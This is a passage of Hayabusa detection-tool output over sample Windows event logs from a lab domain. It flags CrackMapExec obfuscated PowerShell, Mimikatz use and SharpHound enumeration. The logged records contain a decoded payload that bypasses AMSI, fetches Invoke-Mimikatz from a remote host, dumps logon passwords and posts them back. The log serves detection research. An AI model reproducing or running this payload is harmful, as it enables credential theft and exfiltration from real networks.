)|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H
58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: 
SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_sysmon/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter Substring,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:32:55.804 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,". 
( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}101d116,46t83d101A114d118A105A99A101W80N111N105N110N116d77}97A110z97}103z101A114N93,58A58N83d101}114}118t101t114}67A101t114A116N105W102}105,99A97t116}101,86}97}108W105W100z97}116,105}111}110W67,97N108A108}98}97}99A107,32A61t32N123t36}116,114A117}101A125N10A116A114A121}123}10}91}82W101W102A93A46d65}115,115}101d109t98,108t121t46}71z101N116N84t121z112d101d40t39z83N121d115z39}43z39t116N101A109d46}77d97d110N39A43z39W97d103W101W109t101}110N116W46d65A117z116z39W43d39}111d109A97z116}105A111z110z46W65A109}39z43A39}115t105}85t116}39N43z39d105A108A115t39z41N46W71W101}116z70d105N101A108t100,40}39,97}109d39A43W39z115}105}73d110}105}39d43t39A116t70t97N105N108}101d100A39z44z32N39W78A111A110z80W39z43d39,117t98N108}105t99}44N83,116W97}39}43A39}116W105,99W39}41z46A83N101,116z86d97}108t117N101z40A36N110d117A108A108z44N32}36}116}114,117A101N41W10,125,99}97A116A99,104d123t125A10}91t78t101}116,46,83d101W114z118}105N99A101d80A111,105t110}116W77,97N110d97,103A101}114W93}58t58}83A101d114z118t101A114A67N101W114d116,105N102d105N99}97,116W101z86t97}108}105A100A97,116z105A111z110}67W97d108d108}98}97z99,107N32N61,32,123}36d116t114}117}101N125}10N91A83}121,115A116}101z109A46}78}101W116N46A83}101,114,118,105}99N101,80,111A105z110A116A77A97,110N97t103t101t114}93}58d58t83N101t99,117d114z105A116d121,80}114,111}116,111}99A111W108W32}61A32W91W83z121W115}116t101}109d46}78A101t116N46t83N101A99}117d114W105d116A121}80d114W111t116z111}99d111z108}84z121N112z101,93A39,83A115z108,51d44W84}108z115A44N84A108t115A49W49N44,84}108}115N49d50,39W10t73t69t88W32}40A78A101A119A45A79d98d106t101z99}116A32W78}101W116t46}87,101N98A67,108A105d101}110d116,41A46z68d111N119N110z108A111}97A100z83t116A114A105A110,103,40A39d104d116N116N112A115t58A47N47z49}48z46,50}51A46}49d50t51N46}49A49A58N52}52}51W47}73W110A118}111A107}101N45t77}105A109}105,107W97t116z122z46,112t115}49A39,41d10t36d99t109z100t32W61d32t73}110,118,111}107d101W45W77z105}109}105,107d97z116d122W32d45t67z1
11A109W109}97d110t100t32A39,112A114}105N118W105}108N101}103z101N58,58t100d101t98z117t103W32W115W101}107t117d114z108A115}97,58N58W108A111A103A111}110A112A97A115N115z119d111}114d100A115N32N101,120}105}116z39}10,36A114}101z113d117N101}115t116N32d61t32A91}83d121A115W116W101d109t46N78t101A116A46}87z101W98z82t101W113d117A101t115d116d93d58N58W67,114}101d97A116}101z40}39N104N116}116t112,115W58t47d47N49A48d46}50A51A46}49,50N51N46}49A49,58t52d52}51}47}39}41A10z36N114}101z113z117N101A115W116A46d77t101W116W104A111t100,32,61z32,39d80,79,83W84d39z10}36t114A101t113d117W101t115N116z46d67}111A110t116z101z110}116t84d121}112A101}32A61t32A39z97d112W112W108}105,99N97d116t105}111z110z47}120}45A119t119z119}45N102,111N114}109A45d117A114t108z101N110A99A111}100}101A100z39A10t36z98}121,116A101z115A32A61}32}91N83}121A115W116N101d109A46}84}101W120N116}46N69,110}99W111W100}105t110,103A93,58A58z65z83W67d73t73W46A71N101}116t66}121,116A101}115A40,36N99A109A100A41z10A36A114z101A113}117,101N115A116W46,67d111d110z116z101t110A116}76}101z110t103}116A104,32}61t32N36d98,121N116z101}115N46}76z101N110,103z116W104}10A36d114d101A113N117}101A115d116}83z116A114A101,97N109z32,61}32}36}114W101t113N117,101W115A116}46A71}101W116A82z101A113A117N101t115N116t83A116A114}101d97d109}40}41t10z36A114t101d113A117}101A115A116A83N116}114d101}97W109A46,87z114d105,116A101,40}36W98N121z116z101t115}44A32z48}44d32}36A98W121t116A101}115W46,76N101t110W103}116,104t41d10A36z114N101}113A117}101}115d116}83A116N114t101W97W109W46,67}108}111}115d101t40t41A10z36W114}101t113t117N101A115N116t46d71t101W116}82W101z115}112}111A110d115}101}40,41'.SPlIT('Nz}tAdA,}W') | ForEach-ObJEct { ([int] $_ -AS [ChAR]) } ) +$( set-itEM 'VaRiAble:Ofs' ' ' ) )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:55.923 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Variable): ""Set-Variable"" ParameterBinding(Set-Variable): name=""Name""; value=""Ofs"" ParameterBinding(Set-Variable): name=""Value""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:55.942 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ ([int] $_ -AS [ChAR]) },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:56.691 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Item): ""Set-Item"" ParameterBinding(Set-Item): name=""Path""; value=""VaRiAble:Ofs"" ParameterBinding(Set-Item): name=""Value""; value="" """,rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:56.725 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Invoke-Expression): ""Invoke-Expression"" ParameterBinding(Invoke-Expression): name=""Command""; value=""[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object 
Net.WebClient).DownloadString('https://10.23.123.11:443/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('https://10.23.123.11:443/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()"" TerminatingError(Invoke-Expression): ""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:56.725 +00:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.253 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.255 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.274 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.369 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.422 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.425 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.450 
+00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.469 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.477 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-String): ""Out-String"" CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""Transcript""; value=""True"" ParameterBinding(Out-String): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software."" ParameterBinding(Out-Default): name=""InputObject""; value=""Invoke-Expression : At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:1 char:1 + . ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}10 ... 
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand """,rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.512 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.513 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.522 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.524 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.542 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.542 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.556 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.597 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.615 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.626 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-03 08:16:43.008 +00:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx +2021-05-03 08:16:43.017 +00:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx +2021-05-03 08:58:25.921 +00:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:25.942 +00:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:25.949 +00:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:25.950 +00:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.674 +00:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.677 +00:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 
+2021-05-03 08:58:38.679 +00:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.685 +00:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.686 +00:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 